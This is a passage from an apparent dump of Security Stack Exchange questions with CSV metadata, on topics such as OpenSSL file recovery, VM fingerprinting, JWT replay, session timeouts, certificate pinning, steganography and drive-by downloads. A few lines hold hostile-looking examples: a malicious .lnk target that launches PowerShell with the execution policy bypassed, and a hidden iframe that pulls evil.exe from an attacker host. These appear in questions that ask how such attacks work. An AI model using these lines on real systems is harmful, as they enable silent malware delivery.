?m)h;0+-
t$+D'
mIAi
h,|V
Fg.d
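
For what it's worth, that leading Salted__ string is the 8-byte magic header that OpenSSL's enc command writes when a salt is used, so a quick check like this (a minimal sketch, using the filename above) can at least confirm the file is OpenSSL enc output:

# Check for the OpenSSL enc header: "Salted__" followed by an 8-byte salt.
with open("btc.tar.gz.enc", "rb") as f:
    header = f.read(16)

if header[:8] == b"Salted__":
    print("Looks like OpenSSL enc output; salt =", header[8:16].hex())
else:
    print("No OpenSSL 'Salted__' header found")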

I don't know if this is a wallet with a decent amount of coins in it, but even if it has a couple it would be awesome to get in there.

Does anyone have any suggestions for how I may be able to figure out how to decrypt it? If I can figure that out I think I can eventually guess the password I used on it.

I'm assuming I used openssl, but I don't know what cipher I used or anything.

If I'm able to open this and it has anything decent in there I will buy a very nice bottle of whiskey for the gentleman/gentlewoman/insert pronoun here that provided the information. (I know people would help me just because people on here are great... but I would still do so if they wanted it.)

Thank you in advance!

+",224995,,,,,1/14/2020 9:36,How to determine what cipher I encrypted a file with?,,0,3,,,,CC BY-SA 4.0 +224161,1,,,1/14/2020 6:05,,0,79,"

I am wondering if it should be possible to transfer a PIN in the case of migrating between different payment schemes like Mastercard or VISA.

For example, when I have a card issued by Mastercard and it will be changed to VISA, is it possible to keep the same PIN after the new VISA card is issued?

From my perspective, and from what I was able to find, it should be possible, as the algorithm is based on PIN keys and an offset in the case of a PIN change by the user. If the algorithms are the same for Mastercard and VISA, there should not be any issue.

Are there any specifics which should be considered to make the PIN transfer happen?

+",34132,,,,,1/14/2020 6:09,PIN transfer between payment schemes,,1,0,,,,CC BY-SA 4.0 +224163,1,,,1/14/2020 6:21,,1,1043,"

This question was originally Does Firefox in VM have a common enough fingerprint so I don't need tor browser? in the Tor community.

I want to know what a web browser's fingerprint looks like in a VM, if the VM runs a common OS and has default system settings. Can a VM be configured to not have any of the host machine's fingerprint?

(Here I just want to ask about the fingerprint, ignoring IP addresses, web scripts and tracking cookies.)

The VM software we discuss here should preferably be FOSS, like VirtualBox or QEMU.

That question could apply not just to web browsers, but also to other kinds of software.

+",190967,,,,,6/13/2020 8:15,How to configure a VM to protect all my hardware fingerprint from guest OS and softwares?,,2,0,,,,CC BY-SA 4.0 +224172,1,224174,,1/14/2020 9:34,,45,10805,"

If I send an email with an .exe attachment to an Outlook recipient, the email client blocks the attachment and the recipient has no way of overriding this security setting (short of making certain changes to the registry). If I send the same email to a Gmail recipient, the email is refused by the server.


Why are they being so strict? Is there a possibility that the attachment may execute automatically, or is it simply to protect naive users from explicitly executing an untrusted attachment? Would it not be sufficient to use a big, fat warning aka ""Are you really sure you want to do this?""


Of course, I can upload my .exe file to a file sharing service and provide the link in the email. Why is this considered any more safe than an attachment? A malicious scammer may do the same thing.


EDIT: I ask this question partially to learn whether it is safe to turn the feature off (by modifying HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level1Remove). I take it from the answers that this is safe for me personally, but probably not on the administrator level.

+",,user225011,,user225011,1/15/2020 6:14,1/17/2020 17:59,Why do email server/clients block executable attachments?,,7,7,6,,,CC BY-SA 4.0 +224173,1,,,1/14/2020 9:47,,0,50,"

While I came to this site from researching whether inactive (or flattened) PDF documents could contain viruses, and have come across this link on this site, it does not answer my question.

I need to devise a strategy to flatten PDF documents to prevent active fields from inflicting any harm. So, could a flattened PDF document still contain viruses, and would these viruses become active when the document is opened?

+",225012,,,,,1/14/2020 9:47,Can flattened pdf documents contain viruses?,,0,3,,1/14/2020 9:51,,CC BY-SA 4.0 +224176,1,224185,,1/14/2020 10:48,,0,1059,"

I want to be active on Twitter against our oppressive government. Can my government trace and detect me?


Twitter is banned here and we must use VPNs. I use Outline (Shadowsocks) mostly. Is there any way to trace users via information from the ISPs or something? If using Outline is not a good option, is using TOR a good solution?


The importance of this question is that I can be sentenced to death for just a Twitter post! I don't want to be traced. I remove the metadata of images I post and take some basic measures, but I want to be sure there is no problem with my activity on Twitter. What do I have to do?

+",225018,,225018,,1/15/2020 14:56,1/15/2020 15:13,Can my oppressive government trace my Twitter activity and detect me?,,2,4,,,,CC BY-SA 4.0 +224178,1,224182,,1/14/2020 11:09,,-1,461,"

I set up my own VPN by installing OpenVPN on an Ubuntu server, then downloaded the client.ovpn file from the Ubuntu server to my Windows laptop. I then imported that client.ovpn into the OpenVPN GUI app on Windows, connected to my Ubuntu VPN server, and everything works fine.

I installed OpenVPN on the Ubuntu server using these instructions: https://github.com/angristan/openvpn-install

So I think the traffic flow will be like this:

My computer (browser,...) --> Ubuntu OpenVPN server --> Internet.

Does OpenVPN GUI encrypt traffic between my computer and the Ubuntu OpenVPN server?

+",225020,,6253,,1/14/2020 11:12,1/14/2020 13:47,Does OpenVPN encrypt my traffic between my computer and VPN server?,,1,8,,,,CC BY-SA 4.0 +224179,1,,,1/14/2020 13:03,,1,331,"

I was involved in a conversation concerning the in-house vulnerability management program. One of the statements made was that management is generally not willing to accept risk, and that the aim should be to mitigate it, preferably in the form of patching.

On the other hand, there are cases of applications that are vulnerable (most of them have critical and high severity levels) and they are going to be decommissioned by the end of 2020.

The problem is that no one wants to put money on the table for fixing the vulnerabilities, because the product or products will be decommissioned in a few months’ time.

I’m now wondering: aren’t they somehow already accepting the risk by not providing funds for fixing the vulnerabilities, or is it more an example of neglect?

Furthermore, shouldn’t a formal risk management process exist in this case to weigh the cost against the potential loss caused by a possible exploitation of the vulnerability?

+",211245,,6253,,1/14/2020 13:42,1/14/2020 13:50,"vulnerability management, risk mitigation vs risk acceptance",,1,0,,,,CC BY-SA 4.0 +224184,1,,,1/14/2020 14:30,,0,164,"

I am working on Lambda authorization and I learned that there are generally two options.

Either use the default authorizer at the API Gateway level, which will do all the heavy lifting (validate the tokens), or write a custom authorizer, which will require me to implement all the logic including all the token validations, which I would like to avoid if possible. I don't want to write such code; I want to use something that is time-proven and tested.

My question is: is it considered secure to write code in my Lambda (e.g. a Python decorator) that will do authorization based on the data in the Lambda context.authorizer.claims, assuming of course all I need is there (e.g. cognito:groups, cognito:username, etc.)?

Can I treat the authorizer data in the context as solid (i.e. as having passed the security validation)?
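
To make it concrete, the decorator I have in mind is roughly this (a minimal sketch; it assumes the REST API Gateway proxy event shape, where a Cognito user pool authorizer exposes its claims under requestContext.authorizer.claims, and that cognito:groups arrives as a comma-separated string):

import functools

def require_group(group_name):
    def decorator(handler):
        @functools.wraps(handler)
        def wrapper(event, context):
            claims = (event.get("requestContext", {})
                           .get("authorizer", {})
                           .get("claims", {}))
            groups = claims.get("cognito:groups", "")
            # Reject the request if the caller is not in the required group.
            if group_name not in [g.strip() for g in groups.split(",")]:
                return {"statusCode": 403, "body": "Forbidden"}
            return handler(event, context)
        return wrapper
    return decorator

@require_group("admins")
def lambda_handler(event, context):
    user = event["requestContext"]["authorizer"]["claims"]["cognito:username"]
    return {"statusCode": 200, "body": "hello " + user}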

+",225030,,6253,,1/14/2020 15:15,1/14/2020 15:15,Is it secure to rely on the data in a lambda context authorizer claims?,,0,2,1,,,CC BY-SA 4.0 +224190,1,,,1/14/2020 16:30,,-2,103,"

While testing a website I noticed some weird behaviour. When resetting the password, a POST request with an empty body is generated. The request is the following:

POST /reset/token/[token]/passwhord-hash

Now my question is: if Google or any third party intercepts this request, will it also be able to log the password hash and reset token?

+",221732,,,,,1/14/2020 17:02,What part of this request can be logged?,,1,8,,1/15/2020 7:34,,CC BY-SA 4.0 +224191,1,224196,,1/14/2020 16:48,,1,338,"

Backstory: I have been toying with the idea of setting up some Raspberry Pi CCTV cameras. Originally I was going to store all footage for 31 days (complying with the DPA) on a network drive, but I decided against that, as if there was a major incident at my property the drive might get stolen or damaged.

So I thought I could upload footage to my Google Drive and then just have another script run and remove any old footage. I stumbled on PyDrive and thought excellent; I'm fairly experienced with Python, so I'm happy to knock something up.

The problem is the line:

The downloaded file has all authentication information of your application. Rename the file to “client_secrets.json” and place it in your working directory.

I have very limited knowledge of OAuth2 and token use in general; I believe I understand access keys such as SSH or PKI.

As these will be stored locally on a Raspberry Pi Zero, I am concerned that if I were to be burgled they may stuff it in their bag, and then if savvy enough might comb through it and find access to my Google Drive account.

1. Should I be concerned with this type of token?
2. Where should I store it?
3. How should I secure the Raspberry Pi for this scenario?
+",211839,,188129,,1/14/2020 20:02,1/14/2020 20:02,Where to store pydrive secret?,,1,0,,,,CC BY-SA 4.0 +224199,1,,,1/14/2020 19:37,,3,1272,"

OWASP recommends setting session timeouts to minimal value possible, to minimize the time an attacker has to hijack the session:

Session timeout define action window time for a user thus this window represents, in the same time, the delay in which an attacker can try to steal and use a existing user session...

For this, it's best practices to :

• Set session timeout to the minimal value possible depending on the context of the application.
• Avoid "infinite" session timeout.
• Prefer declarative definition of the session timeout in order to apply global timeout for all application sessions.
• Trace session creation/destroy in order to analyse creation trend and try to detect anormal session number creation (application profiling phase in a attack).

(Source)


The most popular methods of session hijacking attacks are session-fixation, packet sniffing, XSS and compromise via malware, but these are all real-time attacks on the current session.

Once hijacked, the attacker will be able to prevent an idle timeout (via activity), and I would consider any successful session hijack a security breach anyway (unless you want to argue how much larger than zero seconds of access an attacker can have before it actually counts as an actual breach).

If the original method of getting the session token can be repeated, this seems to further limit the usefulness of a timeout -- a 5-minute window that can be repeated indefinitely is effectively not limited.

What real-world attack exists (even theoretically) where a session timeout would be an effective mitigation? Is session expiry really just a form of security theater?

+",27894,,-1,,6/16/2020 9:49,1/14/2020 22:24,What attacks are prevented using Session Timeout or Expiry?,,1,11,,,,CC BY-SA 4.0 +224200,1,224203,,1/14/2020 20:41,,39,13548,"

For input validation on a website, are there any security concerns with disclosing to the user exactly what characters are valid or invalid for a given field?


CWE-200: Information Exposure says one should try not to disclose information "that could be useful in an attack but is normally not available to the attacker". A specific example would be preventing a system from exposing stack traces (addressed by CWE-209: Information Exposure Through an Error Message).


Should one ensure that error messages are vague, like "The text you entered contains invalid characters"?


Is it a security vulnerability to include the regular expressions used to validate input in client-side code, such as JavaScript, that would be visible to attackers? The alternative, validating inputs server-side, would reduce usability somewhat as it would require more backend communication (e.g. it could cause the site to respond and display errors slower).
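
(For concreteness, the kind of validation rule I have in mind is a server-side check like this - a minimal sketch with an illustrative character whitelist, not the actual rule from any specific site:)

import re

# Illustrative whitelist for a "display name" field; a real rule would
# depend on the application's requirements.
NAME_RE = re.compile(r"[A-Za-z0-9 .,'-]{1,100}")

def is_valid_name(value: str) -> bool:
    return NAME_RE.fullmatch(value) is not None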


Or is this a form of "security through obscurity" as the user/attacker can deduce what characters are valid by repeatedly submitting different characters to see if they produce errors?


Is it worth the hits to user experience to potentially slow down an attack?


I should note, as far as I can tell, OWASP's Input Validation Cheat Sheet and Data Validation development guide don't provide direction on this topic.


Edit 2020-01-17:


There have been several questions (including answers that I went to the effort of writing comments on that have since been deleted) as to why one should be doing any input validation.


First off, thank you to @Loek for the comment pointing to OWASP's Application Security Verification Standard that provides guidance on passwords on page 23 and 24: "Verify that there are no password composition rules limiting the type of characters permitted. There should be no requirement for upper or lower case or numbers or special characters.".


I think we can all agree that limiting characters in a password is generally a bad idea (see @Merchako's answer). As @emory points out, it probably can't be a hard and fast rule (e.g. I have seen many mobile apps that use an easier-to-use secondary "PIN" to secure the app even if someone else has access to log into the device). I didn't really have passwords in mind when I asked this question, but that's one direction the comments and answers went. So for the purposes of this question let's consider it to be for non-password fields.


Input validation is part of "defense in depth" for websites, web services, and apps to prevent injection attacks. Injection attacks, as stated by OWASP, "can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. Injection can sometimes lead to complete host takeover. The business impact depends on the needs of the application and data."


See OWASP's #1 vulnerability, A1-Injection, and CWE-20: Improper Input Validation for more detailed information. Note they both say input validation is not a complete defense but rather one layer of that "defense in depth" for software products.

+",189599,,189599,,4/11/2022 22:09,4/11/2022 22:09,Is it a security vulnerability to tell a user what input characters are valid/invalid?,,7,5,6,,,CC BY-SA 4.0 +224201,1,224206,,1/14/2020 20:56,,2,338,"

While learning a bit about IT security, one segment of the material was the basics of steganography - specifically, hiding information in the lowest-significance bits of images, and converting images into sounds. For the first technique it occurred to me that many sites compress user-uploaded images, effectively destroying any information hidden this way.

My question is: are there techniques other than changing the lowest-significance bits that survive image compression, but aren't clearly visible?
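
For reference, this is the kind of LSB embedding I mean (a minimal sketch using Pillow and NumPy; file names are illustrative, and it only works if the result is saved losslessly, e.g. as PNG, which is exactly why recompression destroys the hidden data):

import numpy as np
from PIL import Image

def embed_lsb(cover_path: str, message: str, out_path: str) -> None:
    """Hide an ASCII message in the least significant bits of an RGB image."""
    pixels = np.array(Image.open(cover_path).convert("RGB"))
    bits = "".join(f"{b:08b}" for b in message.encode("ascii")) + "00000000"  # NUL terminator
    flat = pixels.flatten()
    if len(bits) > flat.size:
        raise ValueError("message too long for this cover image")
    for i, bit in enumerate(bits):
        flat[i] = (flat[i] & 0xFE) | int(bit)
    # Saving as JPEG here instead would recompress and wipe these bits out.
    Image.fromarray(flat.reshape(pixels.shape)).save(out_path, format="PNG")

# embed_lsb("cover.png", "secret", "stego.png")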

+",164278,,,,,9/4/2020 13:48,What steganographic techniques can I use in images that survive lossy compression?,,1,0,1,,,CC BY-SA 4.0 +224214,1,,,1/14/2020 22:24,,2,305,"

All over the news today (2020-01-14) is the story that the NSA and Microsoft have reported a critical security vulnerability in Windows 10.


But I haven't been able to find clear instructions about how to ensure that Windows Update has worked properly.


When I click the Start button and then type ""winver"" and click ""Run command"", I see that I have Windows 10 Version 1803 (OS Build 17134.191).

When I go to Windows > Settings > ""Update & Security"" > ""See what's new in the latest update"", it bounces me to https://support.microsoft.com/en-us/help/4043948/windows-10-whats-new-in-recent-updates, which doesn't seem to mention security at all.


The Windows Update feature itself seems flaky, confusing, and unreliable.


I'm the most tech-savvy in my large extended family, and I generally try to help others (especially older generations) keep their systems working well, but right now I'm struggling to find a set of steps I can walk them through to confirm that their systems are no longer vulnerable.

+",34766,,,,,1/14/2020 22:49,How to ensure Windows 10 is safe from critical security hole reported by NSA on 2020-01-14?,,1,0,1,,,CC BY-SA 4.0 +224218,1,,,1/14/2020 23:28,,1,550,"

I often download files either using my browser or by torrenting. A few times, I encountered an attack where the torrented file was called something like movie.mp4.lnk and the target was set to run a PowerShell script using cmd.exe /c ""powershell.exe -ExecutionPolicy Bypass ..."". Fortunately, I always noticed the extension before running it, but I may not always be so lucky.


I'd like to configure Windows (I'm using Windows 10 Education) to show a confirmation popup whenever I attempt to run any potentially malicious file (exe, msi, cmd, bat and ps1 for starters) outside a list of defined folders. I'm comfortable with GPO and PowerShell, and would like to avoid solutions using third-party programs if possible.


I already tried to configure AppLocker, but

1. it outright blocks the file, which is usually not what I want, as I often download legitimate programs,
2. for some strange reason, it allows .lnk files with scripts as target.

Ideal scenario:

1. I run notepad.exe, located in C:/Windows/System32, which is whitelisted as a system folder, and it runs without any confirmation.

2. I download a file by torrenting, called awesomeMovie.mp4.exe, to a media folder, maybe D:/Movies/Downloaded. After clicking it, a confirmation dialog pops up, and I have to explicitly click Yes before the program runs. If the file was instead called awesomeMovie.mp4, it opens in my media player without any popup.
+",224340,,,,,2/6/2022 0:09,Show confirmation popup before running any downloaded program in Windows 10,,1,6,,,,CC BY-SA 4.0 +224219,1,227000,,1/14/2020 23:37,,1,448,"

I already read good answers about preventing replay attacks with JWT and a lot of resources like jwt.io.


The conclusion was that I needed to use the jti claim. From: Can I prevent a replay attack of my signed JWTs?


My schema right now is simple:

1. User logs in.
2. Server answers with a JWT.
3. Client checks if it's valid and stores it.
4. Client sends the JWT.
5. If it's valid the Server answers with a new JWT.
6. Wait 30 seconds
7. Go back to step 3.

So I started using jti. On step 4 it will use the jti stored in the db from step 2 and create a new one for the next request.

While this works to prevent replay attacks on the server side, it doesn't for the client side. The flaw I found is: what if the user redirects the traffic and always answers with the same JWT? The client will think ""hey this jwt is valid"".

I had the brilliant idea of saying ""well, the jwt can't be the same as the last one"". And found another flaw: now the user only needs 2 JWTs to break it.

And now I have no idea how to prevent this. I can't save all the JWTs on the client side.

EDIT: I forgot to add that this desktop app requires a constant internet connection; it's like a game where you log in, and if someone logs in with your account you get kicked because your session is not valid anymore.

I'm trying to prevent multiple users on the same account at the same time, and of course trying to prevent the user from reusing the same JWT so that they never need to log in again (it's paid software).
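
For reference, the server-side part of the scheme above is roughly this (a minimal sketch using PyJWT; the secret, the in-memory store and the HS256 choice are all illustrative stand-ins):

import uuid
import jwt  # PyJWT; assumed to be the JWT library in use

SECRET = "server-side-secret"        # illustrative
JTI_BY_USER = {}                     # stand-in for the DB column holding the current jti

def issue_token(user: str) -> str:
    jti = str(uuid.uuid4())
    JTI_BY_USER[user] = jti          # only the newest jti is considered valid
    return jwt.encode({"sub": user, "jti": jti}, SECRET, algorithm="HS256")

def refresh_token(token: str) -> str:
    claims = jwt.decode(token, SECRET, algorithms=["HS256"])
    if claims["jti"] != JTI_BY_USER.get(claims["sub"]):
        raise PermissionError("jti mismatch: token was replayed or superseded")
    return issue_token(claims["sub"])  # step 5: answer with a fresh JWT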

+",206672,,2147,,3/7/2020 22:36,3/7/2020 22:53,Preventing jwt replay attacks against the client-side,,1,0,,,,CC BY-SA 4.0 +224220,1,,,1/14/2020 23:42,,2,154,"

I have a form that takes multiple input fields and makes an API request via GET.


The fields are not properly sanitizing input and I am able to add arbitrary parameters to the query string by submitting input such as test&color=red.


Instead of some sort of encoding, the resulting API query looks like api.com/search?field=search&color=red
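
(For comparison, this is what I would have expected the form handler to do before building the query string - a minimal sketch using Python's standard library:)

from urllib.parse import urlencode

# The user-supplied value is treated as data, not as query-string syntax.
query = urlencode({"field": "test&color=red"})
print("api.com/search?" + query)   # api.com/search?field=test%26color%3Dred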


I cannot think of any malicious use for this, as anybody could just hit this endpoint directly or use a proxy to bypass any client-side validation.


If you were performing an application review, is this something that might be worth calling out?

+",182339,,,,,2/8/2021 14:03,Adding to the query string via input,,4,1,,,,CC BY-SA 4.0 +224222,1,,,1/15/2020 1:41,,3,314,"

My (limited) understanding is that my password is used to encrypt the keys which are used to encrypt my mail messages on protonmail's servers. Does that mean that knowledge of my password could potentially let an adversary find out what the keys associated to my account are, and thus render password change useless? Or are keys periodically subject to change as well, and all my emails re-encrypted? Or have I got it completely wrong?

+",225065,,,,,6/13/2020 23:05,"If my protonmail password is compromised, does that potentially mean that my whole account is, permanently?",,1,0,,,,CC BY-SA 4.0 +224224,1,224229,,1/15/2020 3:29,,0,777,"

I used an OpenSSL 1.0.1k 8 Jan 2015 version to generate a 32-bit RSA key, and I tried to generate a CSR for the key

+ + + +
$ openssl req -new -key privatekey.pem -out csr.pem

139645847348928:error:04075070:rsa routines:RSA_sign:digest too big for rsa key:rsa_sign.c:127:
139645847348928:error:0D0DC006:asn1 encoding routines:ASN1_item_sign_ctx:EVP lib:a_sign.c:314:
+
+ +

OpenSSL only allows me to generate keys no smaller than 384 bits. Is there another way for me to generate a CSR for my private key?
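
(For context on the error itself - the signing operation has to fit a padded hash inside the RSA modulus, and even the smallest common digest is already far larger than 32 bits; a quick check:)

import hashlib

key_bits = 32
for name in ("sha1", "sha256"):
    digest_bits = hashlib.new(name).digest_size * 8
    print(name, "digest is", digest_bits, "bits vs a", key_bits, "bit modulus")
# 160 and 256 bits are both bigger than the whole key, which is why
# RSA_sign reports "digest too big for rsa key".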

+",225070,,,,,1/15/2020 5:45,Generating a CSR for 32 bit private rsa key,,1,3,,,,CC BY-SA 4.0 +224227,1,224236,,1/15/2020 5:04,,3,245,"

Why do we need to ask the authorization server for the Authorization code and then exchange the Authorization code for an Access token on the same server? Why not return an Access token directly, without issuing an Authorization code? I do understand that it is specified by the standard, but there should be some logic behind this.

+",129477,,222373,,1/16/2020 7:05,1/16/2020 7:05,What is the purpose of the authorization code in OAuth 2?,,1,1,,1/26/2020 15:39,,CC BY-SA 4.0 +224239,1,224242,,1/15/2020 12:33,,0,118,"

Many PHP frameworks, such as CodeIgniter, choose in production environments to hide any PHP-related error messages. That also applies to other PHP frameworks such as Symfony and Laravel (with the appropriate settings).

So I wanted to know whether this behavior slightly increases my web app's security, and how security is increased.

+",168285,,,,,1/15/2020 13:11,Does hiding php error messages increase security of the web app?,,1,1,,1/15/2020 13:19,,CC BY-SA 4.0 +224241,1,,,1/15/2020 13:07,,0,207,"

I joined a small project and I noticed that the project uses something like a token associated with a user journey. So the URL looks something like: https://host.com/sell/:jurneyID.

All data entered by the user during the journey is associated with the jurneyID, including email, personal information and so on.

That means when I go to https://host.com/success/:jurneyID I can see user data related to that journey.

There is no concept of a session, which means that anyone who knows the jurneyID can access this data.

In theory the jurneyID is a long, random, unique string and expires after two weeks; however, I still don't like this solution because:

• the token string can be brute-forced
• the jurneyID is part of the URL and therefore can be extracted from logs, browser history, etc.

I'd like to ask if you know any resources which can prove that this solution is a bad idea, and does such a vulnerability have a name?

+",83156,,,,,1/21/2020 23:26,Accessing user data by a public 'token' - is it a potential vunabilility?,,4,4,,,,CC BY-SA 4.0 +224243,1,,,1/15/2020 13:12,,0,238,"

I am developing a website to sell a product that is very likely to be botted. The reason people will bot it is not to spam me or anything, but because they want to buy the product faster than anyone else.


My current strategy has been to lock my purchase page behind a password page. Then, when I release some stock I will reveal the password via Twitter and people can enter it and buy the product. I will make sure the password is not something the bot can just copy and paste, you'll have to put in minimal effort to work it out - but will be very difficult for a computer to do on its own.


The main issue I see with this is that the way I have implemented it is when they go to the password page and submit the password, if they enter the correct password then I give them a cookie with the password in it. Then, when they try and access the purchase page I check the cookie and only let them in if the password is correct. This also applies to POSTing their payment information to my server. The problem is that once they have the password, they can simply enter it into a bot that will then check out a bunch of times. Or even quicker they can have one enter it then copy the cookie and give it to all the others and check out faster and more times than any human could.


I have implemented reCaptcha v2, but honestly that is trivial to bypass with a captcha harvester.


I thought about generating a session ID for each user when they initially visit the password page (will stay the same if they visit again), then when they purchase the product I store their ID in a database. Then, when someone is checking out I see if their ID is in the database already, and if it is then I stop the checkout. This probably solves the cookie sharing issue but doesn't solve getting the password and just checking out multiple times at once via different sessions using Python aiohttp or something.


Tying the cookie to an IP address in a similar way also crossed my mind, but this can be easily circumvented with the use of proxies.


Does anyone have any suggestions as to how I can protect my website? I want my customers to be satisfied and so I would not like bots to be able to buy up all the stock before they can.


EDIT: Another thought was to still use a session ID, then store all session IDs and a boolean for whether or not they have checked out, such that it can be checked in the same way as before. However, I will also store a question ID along with the session ID. This question ID will represent a question that has been randomly selected from a dictionary of questions where the key is the ID and the value is the question and the answer. That way, provided I have enough questions and they aren't easy to solve with a bot, it will be very difficult for them to bot my site. An example of such a question could be ""What is the URL of the most viewed video on YouTube?"".


I realise all of this may seem unnecessary and like it's hurting the user but I think it is worth it.


EDIT2: What about reCaptcha v3? Is a reCaptcha v3 token verified in the same way as v2, i.e. can a v2 generated token using my domain (e.g. by using flask and changing the hosts file then making a captcha and generating tokens that way) be used instead of a v3 token even if my website is using v3, and Google will accept it?

+",225092,,225092,,1/15/2020 13:26,1/15/2020 13:26,How to prevent bots from checking out on my website,,0,12,,,,CC BY-SA 4.0 +224246,1,224248,,1/15/2020 13:49,,6,3519,"

I'm following this article: Android Security: SSL Pinning, to implement certificate pinning in Android using OkHttp.

As our app clients do not update their app regularly, I don't want to take the risk of using our server certificate (the leaf certificate), which will expire in about a month.

**Warning: Certificate Pinning is Dangerous!**

Pinning certificates limits your server team's abilities to update their TLS certificates. By pinning certificates, you take on additional operational complexity and limit your ability to migrate between certificate authorities. Do not use certificate pinning without the blessing of your server's TLS administrator!

In the above article, the author used two approaches. In the first one he used the leaf and intermediate certificates, but in the second one he only used the leaf certificate.

Is it possible to pin both the leaf and the intermediate so that when the leaf gets updated my app will still work?

Is it OK to only use intermediate pinning?

+",125662,,61443,,1/15/2020 14:27,1/8/2021 23:41,Certficate pinning: should I pin the leaf or intermediate?,,3,0,1,,,CC BY-SA 4.0 +224247,1,,,1/15/2020 14:13,,1,199,"

I need to store a frequently-changing set of encrypted data in a database. This can be encrypted and decrypted with an internal key. The data is based upon other metrics within the system, mostly the number of times various things have happened.


Encryption in this case only provides security by obscurity, in that if a person figures out where this data is stored and has database access then they can simply 'roll back' this encrypted blob to an earlier version, thus reverting its contents to a past state.


An HMAC of the data wouldn't help, as an adversary could simply roll back the HMAC along with the message it represents.


Is there a way that I can, at least, detect cryptographically that this data has been rolled back?


My feeling is that I'll need to make some element of the stored data refer to the current state of the system, or make it time-based.
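
(To illustrate that direction - a minimal sketch where the MAC also covers a monotonically increasing version counter, with the current expected counter tracked somewhere the attacker cannot rewrite, or derived from system state/time as suggested above:)

import hashlib
import hmac

def tag_blob(key: bytes, version: int, blob: bytes) -> bytes:
    # The version counter is bound into the MAC alongside the ciphertext.
    return hmac.new(key, version.to_bytes(8, "big") + blob, hashlib.sha256).digest()

def verify_blob(key: bytes, expected_version: int, blob: bytes, tag: bytes) -> bool:
    # A rolled-back blob (with its old tag) fails against the current counter.
    return hmac.compare_digest(tag_blob(key, expected_version, blob), tag)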

+",128610,,,,,2/4/2022 3:01,Detecting/preventing rollback of encrypted data on a server,,2,2,,,,CC BY-SA 4.0 +224251,1,,,1/15/2020 15:44,,0,146,"

I'm trying to intercept my router's ACS requests, which are behind HTTPS. I don't think my router validates certificates, so it should be possible to do a MitM attack. I'm using a Debian laptop with two Ethernet interfaces, eth0 and eth1. eth0 is connected to the WAN port of the router and eth1 is connected to the actual WAN.


I put this into /etc/network/interfaces:

iface br0 inet manual
   bridge_ports eth0 eth1
   up ip link set br0 promisc on arp off up
   down ip link set br0 promisc off down

and executed:

brctl addbr br0
brctl addif br0 eth0 eth1
ifup br0

So far I am able to sniff the communication between my router and the ISP, but of course I can't see the content of the HTTPS requests. I don't know where to go from there. I have tried to preroute the traffic coming to the HTTPS port to port 8080 (on which Burp Suite is listening transparently) with iptables, but it didn't work. Actually I don't know how that would work when br0 isn't assigned an IP address. So if anyone can help me here, I would be grateful.

+",225100,,,,,1/15/2020 15:44,Outside Router MitM Attack,,0,5,,,,CC BY-SA 4.0 +224253,1,,,1/15/2020 15:50,,1,1453,"

Creating certificate:

openssl req -new -newkey rsa:2048 -keyout private/cakey.pem -out careq.pem -config ./openssl.cnf

I have a value that tells openssl not to prompt for the req_distinguished_name fields:

[ req ]
prompt = no

If I use the value ""no"" I get this error:

problems making Certificate Request
1995860064:error:0D07A097:asn1 encoding routines:ASN1_mbstring_ncopy:string too long:a_mbstr.c:158:maxsize=2

I suppose I need to fill in all the default values in the configuration file. But what is missing?

Fragment of openssl.cnf:
[ req ]
prompt = no
default_bits            = 2048
#default_keyfile         = privkey.pem
distinguished_name      = req_distinguished_name # where to get DN for reqs
attributes              = req_attributes         # req attributes
x509_extensions     = v3_ca  # The extentions to add to self signed certs
req_extensions      = v3_req # The extensions to add to req's

string_mask = nombstr


[ req_distinguished_name ]
countryName                     = Country Name (2 letter code)
countryName_default             = US
countryName_min                 = 2
countryName_max                 = 2

stateOrProvinceName             = State or Province Name (full name)
stateOrProvinceName_default     = California

localityName                    = Locality Name (eg, city)
localityName_default            = Hawthorne

0.organizationName              = Organization Name (eg, company)
0.organizationName_default      = PhilNet

organizationalUnitName          = Organizational Unit Name (eg, section)
organizationalUnitName_default  = UN

commonName                      = Common Name (eg, YOUR name)
commonName_default              = CN
commonName_max                  = 64

emailAddress_default            = aaa@bbb.cc
emailAddress                    = Email Address
emailAddress_max
+
+",161270,,,,,1/15/2020 18:51,Default values for distinguished_name,,1,0,,,,CC BY-SA 4.0 +224255,1,,,1/15/2020 16:53,,3,1189,"

I am using Brave Browser Version 1.0.0 Chromium: 78.0.3904.97 (Official Build) (64-bit) on Ubuntu 18.04. The browser has an option, open new private window with Tor. When looking into cache files today, I found a folder named ""Tor Profile"", and then subdirectories ""Cache"" and ""Code Cache"". These further have some subdirectories which finally contain binary files, 'index' and 'the-real-index'. I'm not sure how browsers function and whether this is shady or not, but why are these files even present on the system if they are related to what I browsed in that mode?


Note that no windows of that mode are active.

+",225107,,,,,1/27/2020 18:14,"""Tor Profile"" folder in Brave Browser cache",,2,2,,,,CC BY-SA 4.0 +224260,1,,,1/15/2020 19:15,,0,585,"

I am trying to protect a macOS computer. Specifically, I want to prevent the machine from making unwanted connections over the internet. I am aware of firewalls, of course, but I stumbled upon the idea of adding many domain names to /etc/hosts and redirecting them to 0.0.0.0 to prevent connections to them.

Is this method safe? I can see it does not prevent connecting directly to an IP. Would most malware be fooled by such a hosts configuration, or would it likely use an IP address directly, or not honour the hosts file?

How should I compare using a firewall versus using the /etc/hosts file? I guess the more low-level the mechanism, the harder it is for malware to get around. So which method is lowest level?

+",143641,,,,,1/15/2020 19:25,Modifying host file versus firewall,,1,2,,,,CC BY-SA 4.0 +224273,1,224277,,1/15/2020 23:58,,0,264,"

Does the definition of a drive-by download include the malicious execution of an unaccepted downloaded file, or is the unaccepted download of a file a drive-by download by itself? I didn't find a good/clear definition.


Why is it possible to download files with a hidden iframe, so that the user isn't even asked whether he wants to download it? Something like this:

<iframe src=""https://attacker.com/evil.exe"" width=""1"" height=""1"" frameborder=""0""></iframe>

Isn't this way too risky?

+",225129,,6253,,1/16/2020 7:27,1/16/2020 7:27,Drive by download with iframes,